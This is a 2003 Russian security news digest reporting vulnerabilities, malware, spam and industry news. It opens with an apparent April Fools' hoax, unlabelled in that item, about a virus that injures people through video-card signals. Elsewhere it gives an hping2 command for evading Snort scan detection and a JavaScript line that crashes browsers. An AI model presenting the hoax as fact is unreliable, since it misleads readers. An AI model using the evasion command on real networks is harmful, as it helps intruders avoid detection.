"Лаборатория Касперского", российский лидер в области разработки антивирусных систем безопасности, сообщает о появлении первого в истории вируса, который опасен не только для компьютеров, но и для здоровья их пользователей. Cегодня утром специалистам "Лаборатории Касперского" удалось выделить сигнатуру нового вируса "Human.Lens.a". Уникальная технология заражения и исключительно высокая скорость распространения позволяют назвать " Human.Lens.a " одной из главных угроз, стоящих перед человечеством сегодня. Уже сейчас поступают данные о случаях заражения новым червем из Пакистана, Индонезии и Северной Африки. Отмечены случаи заражения новым вирусом "Human.Lens.a" и в России. "Human.Lens.a" незаметно проникает на компьютеры через интернет или электронную почту и затем берет под контроль драйвера видеокарты, установленной на компьютере. После этого к обычному сигналу видеокарты начинают примешиваться специальные дополнительные помехи, содержащие код вируса и влияющие на подсознание человека. До сих пор, к сожалению, не удалось четко определить все симптомы, заболевших коварным вирусом. Отмечены головные боли, жажда, дрожь в руках, учащенное дыхание. Общая клиническая картина заболевших характеризуется как крайне тяжелая. "Лаборатории Касперского" удалось связаться с главным врачом Центральной Клинической Больницы г. Москвы проф.Т.Г. Мищеряковой. "В данный момент мы располагаем сведениями о 34 заразившихся. Отмечу, что существующие сейчас в России методы воздействия на подсознание по уровню даже близко не приблизились к тому, что мы видим после воздействия этого вируса. В данный момент, к сожалению, у нас нет адекватных методов лечения. Больные помещены в стационар." Подробности - http://www.viruslist.com/index.html?tnews=1001&id=2050183
1/04/2003 18:45 Поздравляем всех с ПЕРВЫМ АПРЕЛЯ!
Как догадались многие, кто присылал нам письма различного содержания (в том числе и гневного :)) - сообщение о покупке нас компанией "Рамблер" было вариантом первоапрельской шутки. Никто нас не приобретал и, надеемся, не приобретёт в ближайшее время. Что касается первоапрельских приколов на различных Рунетовских сайтах, посвящённых компьютерной безопасности - откровенно порадовал сайт securitylab.ru с сообщением о двойниках (тройниках, удлинителях - (с) один из посетителей форума) Саддама Хусейна, а также о том, что российские хакеры взламывали американские крылатые ракеты и ЗРК "Пэтриот". Довольно оригинально и со вкусом. :)
31/03/2003 15:37 Статья "Инструменты для отчёта о последствиях взлома системы".
Hal Flynn из Symantec Corp. сообщает о доступности на сервере securityfocus.com первой части статьи "Incident Response Tools For Unix, Part One: System Tools". Написана Holt Sorenson из Counterpane Internet Security. Как пишет сам автор, его статья посвящена обзору различных утилит и программ, которые помогут системному администратору сотавить для себя (и для CERT) отчёт о взломе системы, если он уже произошёл. Основной упор сделан на ОС: OpenBSD 3.2, Debian GNU/Linux 3.0 (woody), RedHat 8.0 (psyche) и Solaris 9 (aka Solaris 2.9 or SunOS 5.9). Сама статья будет состоять из трёх частей, первая из которых выложена в настоящий момент. В первой части рассказывается о системных утилитах: vmstat, mpstat, iostat, sar, sa, lastcomm, ps, top, lsof etc. Во второй части предполагается рассмотреть утилиты файловой системы, а в третьей различные программы и утилиты для исследования сетевой активности взломанной системы. Статья наверняка будет представлять интерес для системных администраторов. Статья - http://www.securityfocus.com/infocus/1679
31/03/2003 14:10 Возможность подделки цировой подписи в Adobe Acrobat Plug-In.
Владимир Каталов из небезызвестной фирмы Elcomsoft сообщает об обнаружении уязвимость в Adobe Acrobat. В частности, эта уязвимость присутствует в Adobe Acrobat Reader, который не в состоянии проверять законность дополнений (Plug-In) к программе, вне переносимых выполняемых заголовков. В результате, дополнение к программе, с правильной цифровой подписью, может быть изменено и Adobe Acrobat будет доверять этому изменению. Также доверяемое дополнение может быть изменено таким образом, чтобы загрузить произвольное недоверяемое дополнение к программе. Уязвимость обнаружена в Adobe Acrobat 4.0.5 - 5.0.5. Подробности - http://www.SecurityLab.ru/?ID=36870
31/03/2003 13:40 Уязвимость в RealPlayer.
Core Security Technologies сообщает об обнаружении уязвимости в RealPlayer - популярной программе, выпускаемой RealNetworks, Inc. Программа может использоваться для проигрывания большого-количества медиа-файлов, в том числе и для просмотра графических файлов формата PNG (Portable Network Graphics). Уязвимость, которая может привести к переполнению кучи (heap overflow), обнаружена в способе, которым производится декомпрессия файлов PNG. Cжатие файлов PNG осуществляется согласно RFC 1951 "DEFLATE Compressed Data Format Specification". При этом может использоваться либо динамическое, либо статическое кодирование по методу Хаффмана. При использовании статического кодирования количество данных, которые могут быть декодированы превышает объём буфера, выделфемый в программе. Сконструировав специальный PNG-файл, удалённый или локальный злоумышленник может выйти за пределы буфера и заполнить пространство памяти программы произвольными данными, что может позволить ему получить удалённый шелл или выполнить произвольный код от имени пользователя, который просматривает этот файл. Уязвимость обнаружена в: RealOne Player v2, v1 (платформы Win32), RealOne Player for OS X, RealPlayer 8/RealPlayer Plus 8 (платформы Win32 и Mac OS 9), RealOne Enterprise Desktop (Win32). RealNetworks выпущен патч, перекрывающий эту уязвимость. Подробности - http://www.coresecurity.com/common/showdoc.php?idx=311&idxseccion=10
31/03/2003 13:10 Недельный отчет о вирусах Panda Software.
Panda Software опубликован недельный отчёт активных вирусов прошлой недели. На прошлой неделе особо были заметны: Rolark, SFC, Lovgate.F и Lovgate.G. Rolark – троянец, созданный для получения удаленного доступа и полного контроля над зараженными компьютерами. Это удается благодаря бреши, присутствующей на веб серверах, работающих с Windows 2000 и Internet Information Server 5.0. Ошибкой в данном случае является переполнение буфера в библиотеке ntdll.dll, используемой WebDAV. Обнаружить Rolark достаточно сложно, поскольку он не выводит никаких сообщений, не копирует и не устанавливает себя на заражаемый компьютер, что позволяет злоумышленникам атаковать некорректно обновленные серверы. Второй вредоносный код, рассматриваемый в отчете, - SFC, макровирус, распространяющийся через приложения IRC и PIRCH, а также по электронной почте. Сообщение, зараженное данным вирусом, распознать несложно, так как оно содержит документ Word, в котором указано, что файл 'SFC.EXE' заражен вирусом. Однако, 'SFC.EXE' является системным файлом Windows, присутствующим на все компьютерах с операционной системой Windows. SFC заражает общий шаблон Word, и все открываемые и сохраняемые документы на таком компьютере становятся зараженными. Также вирус не позволяет работать с макросами и отключает антивирусную макрозащиту, встроенную в редактор. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=128
31/03/2003 12:06 Сервис-пак для Windows XP заставляет компьютеры "тормозить".
Корпорация Microsoft известила пользователей своей флагманской ОС Windows XP об очередной неприятной проблеме. Как оказалось, установка первого пакета обновлений (Service Pack 1) для ОС Windows XP способна в некоторых случаях вызывать значительное замедление работы компьютера. Это связано с изменениями, вносимыми при установке SP1 в механизм управления системной памятью. Проблема актуальна как для Windows XP Home Edition, так и для профессионального варианта ОС. В результате, процесс выделения приложениям больших блоков памяти и обратные действия стали выполняться значительно медленнее. В случае программ, требующих частого выделения или высвобождения больших блоков памяти, скорость работы после установки сервис-пака может снижаться десятикратно, по сравнению с операционной системой, в которой пакет исправлений не инсталлирован. Учитывая возможность возникновения серьезных проблем у некоторых пользователей, программисты Microsoft подготовили соответствующий патч. Однако в компании рекомендуют устанавливать его только в случае действительно значительного замедления работы после установки пакета SP1 Подробности - http://www.compulenta.ru/2003/3/31/38670/
31/03/2003 11:08 Предварительная версия Service Pack 2 для Windows XP утекла в Сеть.
На сайте Neowin опубликована информация о появлении в интернете одного из предварительных вариантов второго пакета обновлений для ОС Windows XP. Появившаяся в Сети версия Service Pack 2 имеет номер 5.1.2600.1185 и состоит в основном из дополнений к Windows XP, выпущенных ранее в самостоятельном виде. Процесс установки предварительной версии SP2 аналогичен процессу установки первого сервис-пака. В появившейся в интернете версии сервис-пака отсутствуют новые версии встроенных в Windows приложений, появившееся с момента выхода SP1. В нем нет ни поддержки Windows Media Player 9, ни интернет-пейджеров Windows Messenger 5/MSN Messenger 6, ни Movie Maker 2, ни программного интерфейса DirectX9. Очевидно, что состав тестовой версии SP2 далеко не окончателен и может еще заметно измениться: в него войдут новые патчи и обновления программ. Источник - http://www.neowin.net/comments.php?category=main&id=9867
31/03/2003 10:25 Студентов попросили не копировать аудиозаписи.
Международные звукозаписывающие корпорации предприняли очередное наступление в своей войне против цифрового пиратства. На прошлой неделе Международная федерация индустрии звукозаписи (IFPI) направила руководству высших учебных заведений в 25 странах послание с призывом ограничить использование вузовских компьютеров для незаконного копирования аудиозаписей. Ассоциация IFPI, объединяющая около 1500 звукозаписывающих и дистрибьюторских компаний во всем мире, на основании проведенного ею исследования утверждает, что более 50% пропускной способности вузовских каналов доступа в интернет используется для незаконного обмена аудиозаписями. Особенно массовым такой обмен стал с появлением специализированных файлообменных сетей - после закрытия Napster самыми известными из таких сетей являются KaZaA и Morpheus. "Многие университеты и колледжи, сами того не сознавая, попустительствуют нарушению авторских прав, - говорит Джей Берман, председатель IFPI. - Эти нарушения осуществляются с использованием университетских компьютерных сетей. Поэтому пресечение подобной практики полностью соответствовало бы интересам самих вузов". Источник - http://www.cnews.ru
31/03/2003 10:03 Статья "Повесть о Linux и DoS-атаках".
На сайте Linux Gazette (русской редакции) опубликована статья Ивана Песина "Повесть о Linux и DoS-атаках". Cобственно, в самой статье описываются методы защиты и противодействия сетевым атакам типа DoS (как технические, так и административные). Целью таких атак, как следует из названия, является приведение сервера-жертвы в состояние, когда он не может отвечать на запросы клиентов. Побочным эффектом таких атак является большой трафик, направленный на жертву. Этот эффект, часто игнорируемый специалистами на Западе, приобретает несколько другой оттенок на просторах бывшего Союза. Статья - http://gazette.linux.ru.net/rus/articles/lnx_dos.html
30/03/2003 22:01 Cтатья "Фильтрация интернет траффика с помощью squidGuard".
Довольно любопытная и, несомненно, полезная статья Андрея Бешкова ака tigrisha (www.sysadmins.ru) под полным названием "Система фильтрации интернет траффика на основе squidGuard + Apache + Squid + Berkeley DB" обнаружена на сайте onix.opennet.ru. Целью cтатьи являлось описание процесса создания простой в управлении и, в то же время, гибкой в настройке системы фильтрации интернет-траффика. "Как любой другой ресурс интернет траффик имет обыкновение заканчиваться. Да и канал от нас к провайдеру не резиновый, Отсюда вывод - необходимо тем или иным образом ограничить аппетиты пользователей. С другой стороны если начальство поймает кого-то из сотрудников за просмотром порносайтов или скачиванием mp3, нагоняй получит не только провинившийся. Администратор будет виноват в том, что позволяет пользователям тратить оплачиваемый организацией трафик на всякую ерунду. В тоже время стоит помнить что разные организации могут иметь различные правила пользования интернет. Довольно часто в списке запретов можно встретить не только эротику, но и сайты анекдотов, форумы и чаты. Например бесплатные почтовые сайты могут быть запрещены из сображения секретности. Одновремнно можно запретить пользователям скачивать из наружной сети выполняемые файлы. Это существено снижает опасность вирусного заражения сети". Статья http://onix.opennet.ru/squid/squidguard.html
30/03/2003 18:04 Взломан Protected Storage.
Как сообщается на форуме по компьютерным вирусам ака VX-Forum от имени команды hangupteam, ребятами из этой команды найдена возможность взлома защищённого хранилища, ака Protected Storage (то есть того места, в котором хранятся конфиденциальные данные IE, Outlook etc.). Таким образом, получение паролей от Outlook, автозаполнения, и т.д. теперь не проблема (по словам одного из членов команды). Далее цитируем: "Исходник на си скоро будет доступен по Tech-exchang'y. Чтобы получить данные из хранилища приходится последовательно вызвать 9 (!!!) функций из pstorec.dll, попутно вычисляя их адреса (функции не экспортированы!)". Источник - http://hangup.da.ru
30/03/2003 14:20 Депутат Митрохин просит помощи ФСБ.
Как сообщает агентство "МК-Новости", в течение 3 дней в адрес партии "Яблоко" в массовом порядке поступают возмущенные звонки и письма пользователей интернета в связи продолжающейся спаматакой на российских пользователей от имени депутата Сергея Митрохина. Из пресс-службы фракции сообщили, что репутации депутата и партии нанесен ущерб, поскольку некоторые из пользователей электронной почты получили до 400 одинаковых сообщений. Атака началась 26 марта, когда неизвестными злоумышленниками от имени Сергея Митрохина произведена несанкционированная электронная рассылка. В письме содержатся "предложения о сотрудничестве" и ссылка на персональный сайт депутата. Анализ показал, что для рассылки "подметных" писем были использованы несколько серверов, находящихся за рубежом. Это затрудняет поиск спамеров, однако специалисты "Яблока" продолжают расследование инцидента. Предполагается, что подобные акции могут и в дальнейшем использоваться как способ опорочить конкурента в глазах избирателей. Партия "Яблоко" считает подобные методы ведения политической борьбы недостойными и заявляет, что никогда не использовала и не будет использовать веерную неперсонифицированную рассылку (спам) в качестве инструмента агитации. Господин Митрохин собирается отправить запрос в ФСБ, сообщает "МК-Новости". Источник - http://www.securitylab.ru
30/03/2003 13:05 Подробности уязвимости в sendmail.
Как и следовало ожидать, после объявления о выпуске версии sendmail 8.12.9 и уязвимости в предыдущих версиях, последовало подробнейшее описание уязвимости в sendmail до версии 8.12.8 от Michal Zalewski (поляк по национальности, в найстоящий момент проживает в Калифорнии, США). Сам Залевский пишет, что уязвимость обнаружена в файле parseaddr.c в функции prescan() и связана с неверной проверкой границ при выполнении преобразования символьных данных в целочисленные. При проведении атаки может возникнуть ситуация, когда будут превышены границы размера буфера и произойдёт перезапись переменных стека. Однако, как говорит сам автор, он очень сильно сомневается в возможности удалённого получения прав суперпользователя. Однако, при выполнении определённых условий может возникнуть возмоность компрометации эккаунта smmsp и получение контроля над почтовой очередью. О существовании эксплоита пока ничего не сообщается. Подробное описание - http://www.securityfocus.com/archive/1/316773/2003-03-27/2003-04-02/0
30/03/2003 12:22 Уязвимость в snort.
Тоби Миллер пишет о возможности обхода защиты системы определения попыток вторжения snort, применяемой на многих серверах под управлением ОС построенных на базе открытого ПО (Linux, FreeBSD etc.). Автором было установлено, что при формировании пакета с установленными флагами SYN,FIN и ECN, сканер snort не опрделяет этот тип сканирования. Для формирования этих флагов, автор применял пакет hping2: hping2 -t 104 -N -W -s 18245 -p 21536 -S -F -X 'IP Address'. Подобная "особенность" была обнаружена в версии 1.9.1. Рекомендуется обновить версию snort до Snort-2.0.0rc1. Подробнее - http://www.security.nnov.ru/search/document.asp?docid=4292
30/03/2003 12:11 Выход очередного журнала x25zine.
Как сообщал нам madcr (сайт www.x25zine.org), вышел очередной (третий) номер электронного журнала x25zine. В настоящий момент доступна русская версия журнала. Английская версия будет доступна через сутки. В третий номер вошли такие статьи: split the net, а openvmsы здесь разные, инфицирование на лету, /dev/* patching на linux, digital unix, m68k шелкоды, back2start: raw, back2start: elf & lkm, мониторинг в x25: data scope и другие. Скачать - http://www.x25zine.org/x25zine3_rus.zip
30/03/2003 11:54 Уязвимости во многих броузерах?
Довольно любопытное сообщение появилось в BUGTRAQ от Marc Schoenefeld. Как он пишет, существует возможность при помощи liveconnect (то есть вызов java через javascript) можно вызвать отказ функционирования броузеров Netscape 7.02 и Opera 7 на Windows XP. В качестве виртуальной машины (JVM) в обоих броузерах применялся пакет Java 1.4.1_02 от Sun. Код, при помощи которого можно "свалить" броузеры является: <script language="Javascript"> t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);</script> Но дальнейшие сообщения от других авторов констатировали такую же возможность и в других броузерах: Mozilla 1.2a для Linux, Mozilla 1.2.1 для Windows. Источник - http://www.securityfocus.com
30/03/2003 10:32 Выпущена новая версия MTA sendmail.
Sendmail, Inc., и the Sendmail Consortium сообщает о выходе новой версии популярного MTA, выпускаемого и поддерживаемого этим консорциумом - 8.12.9. Напомним, что предыдущая версия (8.12.8) была выпущена 3 марта сего года - таким образом, не прошло и месяца после выпуска предыдущей версии. Предыдущая версия была выпущена для закрытия возможности удалённого переполнения буфера при разборе заголовков письма, дающего удалённому пользователю возможность получения прав суперпользователя (обнаружена ISS X-Force). Новая версия также закрывает возможность переполнения буфера при разборе заголовков специальным образом сформированного письма, но на этот раз подобное переполнение происходит при преобразовании символьных данных (char) в целочисленные (int). Уязвимость была обнаружена известным исследователем компьютерной безопасности Michal Zalewski. Как пишет в анонсе Клаус Ассманн от имени Sendmail, консорциум не планировал вчера (29 марта) объявлять о выпуске новой версии, однако в публичных списках рассылки каким-то образом появилась закрытая информация об уязвимости, поступившая от неизвестного источника. Более подробной информации пока не появлялось. Всем администраторам настоятельно рекомендуют обновиться до версии 8.12.9, либо применить патчи, выложенные на сайте sendmail.org. Подробности - http://www.sendmail.org/8.12.9.html
29/03/2003 22:18 Мошенничество хакера из Запорожья обошлось “Укртелекому” в 38 тысяч .
Злоумышленник организовал свой бизнес на списании долгов за телефонные переговоры. Его клиентами были, как правило, иностранцы, чьи счета составляли порядка тысячи гривен в месяц. “Народный умелец” оказался бывшим программистом «Укртелекома», участвовавшим в создании программы автоматизированного учета телефонных переговоров и контроля за их оплатой. После увольнения он договорился с кассиром сберкассы и за 50% списывал долги за переговоры, пользуясь своим кодом доступа к системе. В настоящее время злоумышленник задержан, в его отношении возбуждено уголовное дело по ст. 361 Уголовного кодекса Украины за “незаконное вмешательство в работу электронно-вычислительных машин и компьютерных сетей”. Исчтоник - http://www.crime-research.org
29/03/2003 17:27 В сотовой связи завёлся "шпион".
Как сообщили в пятницу РИА "Новости" в прокуратуре Центрального района города, работник одного из операторов мобильной телефонной связи обвиняется в том, что предоставил местной коммерческой структоре сведения о 4 руководителях крупных новосибирских предприятий, являющихся абонентами компании. В частности, им были предоставлены данные о том, когда и на какие номера телефонов эти абоненты звонили, сколько минут длились разговоры. В прокуратуре отметили, что подобные сведения являются закрытыми и сотрудник компании сотовой связи не имел права предоставлять их посторонним. Эти данные могли быть использованы для определения круга знакомств предпринимателей, которые проходят по делу в качестве потерпевших. Факт противоправной деятельности был выявлен службой безопасности компании сотовой связи, которая и обратилась в правоохранительные органы. Сотруднику компании предъявлено обвинение по статье УК РФ 138 ч. 2 - "Нарушение тайны переписи и телефонных переговоров". Его дело следователи прокуратуры на днях направили для рассмотрения в один из районных судов города. Скандал вокруг разглашения данных об абонентах компании сотовой связи в Новосибирске разгорелся впервые. Источник - http://www.rian.ru
29/03/2003 16:53 Противники войны вывели из строя сайт правящей партии Испании.
Официальный сайт правящей Народной партии Испании был выведен из строя после осуществления на него мощной «спам-атаки» при помощи тысяч электронных посланий. Участники антивоенного движения в Испании, которые используют интернет и мобильную связь для организации и координации своих действий, выступили таким образом с протестом против политики правительства в отношении Ирака. Надо отметить, что свой протест войне некоторые интернетчики выражают и другим способом. Так, по данным американской администрации, ежедневно с пятницы прошлой недели, когда начались военные действия в Ираке, атакам хакеров подвергается около 2,5 тыс сайтов правительственных и военных организаций. «Начало иракской кампании вызвало волну электронных атак», — говорится в докладе государственного департамента США. На данный момент установлено, что следы хакерских атак ведут во многие страны мира, среди которых Индонезия, Малайзия, Марокко, Пакистан, Египет, Саудовская Аравия, Турция, Франция, Бразилия, Мексика и ряд стран Восточной Европы. Источник - http://www.webplanet.ru
29/03/2003 16:19 ОС Windows Server становится модульной.
В следующем месяце Microsoft выпустит Windows Server 2003, однако многие компоненты операционной системы еще будут находиться в стадии разработки. Microsoft приняла более модульный подход в отношении выпуска ОС по сравнению с предыдущими версиями Windows Server. В долгосрочном плане это может вылиться в увеличение гибкости модели продаж по мере появления дополнительных компонентов. Кроме того, данная стратегия позволит Microsoft постепенно выпускать технологии, которые на 24 апреля, дату выпуска Windows Server 2003, еще не будут готовы. Раньше Microsoft включала в основную версию Windows Server огромное число функций, а затем добавляла лишь мелкие усовершенствования. Новый подход означает, что компания сможет вносить усовершенствования в Windows Server 2003, не дожидаясь выпуска следующей версии серверной ОС с кодовым названием Blackcomb, который планируется на конец 2004 или начало 2005 года. Подробнее - http://www.zdnet.ru/?ID=298292
29/03/2003 14:03 Исследование эксплоита NTDLL.DLL.
Eric Hines из Fate Research Labs объявил о выпуске документа, который посвящён исследованию эксплоита, использующего уязвимость NTDLL.DLL в компоненте WebDAV вэб-сервера IIS. Этот эксплоит был ранее опубликован Романом Медина из Roman Soft. Документ - http://www.fatelabs.com/library/fatelabs-ntdll-analysis.pdf
29/03/2003 13:50 Инструмент для проведения атаки на OpenSSL.
В Интернете выложены исходники пакета, который посзволяет проводимть так называемую Vaudenay's TLS Timing Attack. Этот тип атаки на OpenSSL до версии 9.7а был продемонстрирован доктором Serge Vaudenay на конференции Eurocrypt'02 и демонстрировал уязвимость алгоритма шифрования, основанного на "цепочке цифровых блоков" ("Cipher BlockChaining"). Выпущенный инструмент под названием Omen проверялся при работе против IMAPrev4 - сервера с инкапсуляцией пакетов при помощи stunnel 3-22 и применении OpenSSL/9.7. В качестве клиента применялся Microsoft Outlook Express 6.x IMAP - клиент. Сайт проекта - http://omen.vuagnoux.com/
29/03/2003 12:45 Новый протокол передачи данных бьет все рекорды.
Протокол обмена данными в сетях связи, разработанный американскими учеными из Калифорнийского технологического института, позволяет утроить скорость передачи данных в интернете. Теперь максимальная скорость передачи составляет 7 гигабит в минуту, что в 3500 раз быстрее, чем при стандартном широкополосном соединении. Разработчики из Калифорнии намерены опубликовать новый протокол, который будет бесплатным, к лету этого года. Работа над этим проектом проводилась, прежде всего, для того, чтобы физики во всем мире могли быстро обмениваться информацией. Речь идет, в первую очередь, об обработке данных, получаемых в экспериментах на ускорителях, - здесь объем информации удваивается каждый год, а ее обработкой занимаются коллективы ученых в разных странах мира. Не в меньшей степени в новом протоколе нуждаются биологи, инженеры, медики. Ученым зачастую приходится обмениваться файлами размером в 1000 ГБайт, и пропускная способность сетей стала реальным препятствием на пути развития науки.При этом реальным ограничением стала не емкость физического канала, а сам протокол контроля передачи данных (ТСР), который управляет процессом передачи данных с компьютера на компьютер. ТСР делит информации на небольшие пакеты, а принимающий и передающий данные компьютеры "общаются" между собой с целью проверки того, что все пакеты пришли в неизмененном виде. Если же при передаче произошло искажение или потеря пакета, передающий компьютер повторяет пересылку. При увеличении числа ошибок принимающий компьютер делает вывод о том, что в сети возник затор и отдает приказ о сокращении вдвое скорости отсылки пакетов. Это слишком резкое сокращение и является основной причиной того, что скорость передачи данных в сетях явно не соответствует их физической пропускной способности. Калифорнийские исследователи предложили иной способ регулирования скорости передачи данных. В новом протоколе (он будет называться FAST - Fast Active queue-management Scalable TCP) иная процедура контроля при возникновении затора в сети. В ней предусмотрено измерение времени задержки между отсылкой пакета и приемом подтверждения о его получении. Если это время возрастает, то уменьшается скорость передачи, но совсем ненамного, не в два раза, как в ТСР. Источник - http://www.nature.com
28/03/2003 22:13 Новый троян использует брешь в IIS.
Эта брешь связана с переполнением буфера в библиотеке NTDLL.DLL, использующейся некоторыми компонентами, но ошибка возникает лишь в том случае, если WebDAV связан с IIS 5. При отправке особым образом составленного запроса в WebDAV возникает переполнение буфера, что, в свою очередь, может привести к получению злоумышленником полного контроля над сервером. Rolark - необычный троян, так как он не устанавливается на сервер и не создает на нем никаких файлов для выполнения своих действий. Этот вредоносный код может проникать на компьютер и управляться удаленно, и зараженная машина, таким образом, используется в качестве базы для проведения дальнейшего заражения. При этом идентификационный номер компьютера, с которого производится атака, скрывается. Источник - http://www.securitylab.ru
28/03/2003 21:40 CERT представила список дыр в Lotus Notes и Domino.
Организация CERT, специализирующаяся на проблемах компьютерной безопасности, представила вниманию общественности отчет о дырах в программных продуктах семейств Lotus Notes и Domino. Уязвимости, о которых идет речь в отчете CERT, были обнаружены компаниями NGS Software и Rapid7. Значительная часть дыр уже исправлена. Большинство уязвимостей актуальны для клиентов Lotus Notes и серверов LotuS Domino версий младше 5.0.12 или 6.0 Gold/6.01. Ошибки в ПО различной степени тяжести - от совсем неопасных до критических, которые позволяют злоумышленникам проводить DoS-атаки и выполнять скрипты на удаленном компьютере. Чаще всего в отчете фигурируют дыры, которые связаны с ошибкой переполнения буфера в различных компонентах Notes и Domino. Первая из уязвимостей касается сервера приложений Oracle 9i и носит критический характер. Направив на сервер определенным образом отформатированную строку с запросом, злоумышленник может захватить управление сервером. Следующая дыра характеризуется высоким уровнем риска и связана с переполнением буфера функции TO_TIMESTAMP_TZ СУБД Oracle 9i. Аналогичная характеристика дается третьей и четвертой дырам в продуктах Oracle. Пятая уязвимость содержится в сервере баз данных Oracle и связана с ошибкой переполнения буфера, возникающей в процессе аутентификации пользователей. По своей опасности эта дыра аналогична трем вышеупомянутым уязвимостям СУБД Oracle 9i, однако имеет более высокий - критический - рейтинг, так как для совершения атаки злоумышленнику необязательно знать имя пользователя и пароль. Шестая дыра ( в Lotus) связана с наличием в службе перенаправления пользователя пакета Domino 6 возможности переполнения буфера. Запрашивая определенные документы или данные злоумышленник может произвести вызов функции перенаправления со слишком длинным параметром hostname (имя узла), что и вызовет ошибку. Особенно эта дыра опасна из-за того, что служба перенаправления по умолчанию доступна даже анонимным пользователям. Еще одна уязвимость среднего уровня опасности имеется в модуле ActiveX клиентской части iNotes. Она является следствием переполнения буфера функции InitializeUsingNotesUserName, которое злоумышленник может произвести с помощью электронного письма в формате HTML или особой веб-страницы. В результате, хакер способен захватить управление клиентской системой с правами работающего в данный момент пользователя. Полный список уязвимостей на сайте CERT. Довольно опасной является уязвимость , связанная с наличием ошибки переполнения буфера метода класса COM, описывающим элементы управления в Lotus Notes и Domino. Если хакер заманит пользователя на веб-страницу с вредоносным HTML-кодом или пришлет его в электронном письме, он сможет захватить управление компьютером. Первоначально об этой критической уязвимости сообщила в феврале фирма NGS Software. Тогда дыра была ошибочно отнесена к одному из модулей ActiveX компонента iNotes. Это, однако, лишь один из сценариев атаки. На самом деле, дыра неспецифична для iNotes или ActiveX. К счастью, IBM уже выпустила соответствующие патчи, которые рекомендуется незамедлительно установить всем пользователям Lotus Notes и Domino. Источник - http://www.viruslist.ru
28/03/2003 21:35 "Аль-Джазира" отбивается от виртуальных борцов за свободу.
Сайт катарского телеканала "Аль-Джазира" подвергся электронной атаке со стороны группы хакеров, называющей себя "Виртуальной армией борьбы за свободу". Как утверждает BBC News, посетители арабскоязычного сайта при попытке открыть его переправляются на порнографические страницы Интернета. Вместо англоязычного сайта пользователи увидят американский флаг и лозунг Let Freedom Ring. Напомним, что неполадки на серверах телеканала начались во вторник, сразу после открытия англоязычного сайта. Хакеры использовали для атаки метод "denial of service", предполагающий перегрузку сервера огромных количеством запросов. Серверы, предоставляющие хостинг сайту "Аль-Джазира", находятся в Катаре, во Франции и США. Источник атаки определить пока не смогли, но, сбои в работе присутствовали только на американских серверах. Специалисты предполагают, что неполадки могут быть устранены не ранее субботы. Честно говоря мне (SOLDIER) лень тут что-то поправлять. Источник - http://www.lenta.ru
27/03/2003 18:21 DoS против RPC Endpoint Mapper в Microsoft Windows NT/2000/XP.
Уязвимость обнаружена в части RPC протокола, который используется для обмена сообщениями через TCP/IP. Удаленный атакующий может аварийно завершить работу всех RPC - служб. Как сообщается, уязвимость связанна с неправильной обработкой некорректных сообщений в RPC Endpoint Mapper процессе, который слушает на 135 порту. В результате удаленный пользователь может нарушить работу этой службы, что приведет к нарушению работы всех RPC - служб на уязвимой системе. Уязвимость обнаружена в Windows 2000 и Windows XP. Windows NT 4.0 уязвима к этой проблеме, но ее архитектура не позволяет выпустить патч, устаняющий эту уязвимость. Microsoft оценила риск обнаруженной уязвимости как "Important". Подробности и эксплоит - http://www.securitylab.ru/?ID=36853
27/03/2003 17:08 OpenOffice 1.1. уже доступен.
По сообщениям РБК, проект OpenOffice , сообщество разработчиков ПО, продвигающих бесплатные офисные пакеты, представил первую бета-версию своей программы OpenOffice 1.1. Создатели программы утверждают, что ПО в основном стабильно, хотя и не исключают наличие в нем багов. OpenOffice 1.1 имеет несколько усовершенствований, среди которых возможность экспорта и импорта файлов в форматах PDF, Macromedia Flash и DocBook, а также файлов офисных приложений для КПК. Кроме того, OpenOffice поддерживает электронную обработку текста на хинди, иврите, тайском и арабском языках. А функция проверки правописания автоматически распознает используемый в документе язык. Вместе с бета-версией OpenOffice 1.1 стала доступна и немецкая версия пакета OpenOffice версии 1.0.2. Скачать - http://www.openoffice.org/dev_docs/source/1.1beta/
27/03/2003 16:25 Указ Буша относит информацию об интернете к категории, подлежащей засекречиванию.
Президент Буш подписал указ, наделяющий правительство правом засекречивать информацию о критически важных инфраструктурах, к которым относится и интернет. Во вторник вечером Буш изменил определение того, что может расцениваться правительством как конфиденциальная, секретная и особо секретная информация, дополнив его деталями об «инфраструктурах» и оружии массового поражения. Из нового указа явно следует, что информация, относящаяся к «защите от международного терроризма», подлежит засекречиванию. В указе, заменяющем директиву президента Билла Клинтона от 1995 года, говорится, что уже рассекреченная и обнародованная информация может быть снова засекречена федеральным ведомством. Согласно указу Клинтона, «информация не может засекречиваться после того, как она была рассекречена и обнародована». Дэвид Собел (David Sobel), главный консультант Electronic Privacy Information Center, не понимает, зачем администрация Буша включила в указ термин «инфраструктура». Ведь интернет и другие критические инфраструктуры вполне можно описать при помощи существующих научных, технологических или экономических понятий, относящихся к национальной безопасности. «Для меня остается загадкой, зачем было пересматривать и расширять старый указ», — говорит он. Подробности - http://zdnet.com.com/2100-1105-994216.html
27/03/2003 16:12 Спам с президентской подписью.
Вчера многие пользователи рунета получили в свои почтовые ящики спам от имени партии "Единая Россия", предлагающей вступить в свои доблестные ряды. Письма отправлялись с самых различных адресов, однако в качестве обратного адреса указывался e-mail московской организации "Единой России". Подписано письмо было Президентом В.В.Путиным. Как сообщает РИА Новости, "Единая Россия" выступила с заявлением о том, что данная рассылка "не имеет никакого отношения к деятельности партии и является плодом грязных избирательных технологий, используемых нашими противниками". "Удар намеренно нанесен именно по московской организации, так как на данный момент она является сильнейшим региональным отделением партии", - подчеркивается в документе. Сам факт столь раннего начала предвыборной кампании, говорится в заявлении, "уже свидетельствует о беспомощности наших оппонентов противостоять " Единой России" в честной борьбе". Источник - http://www.rian.ru
27/03/2003 14:08 Шведская полиция нашла автора вируса "Ganda".
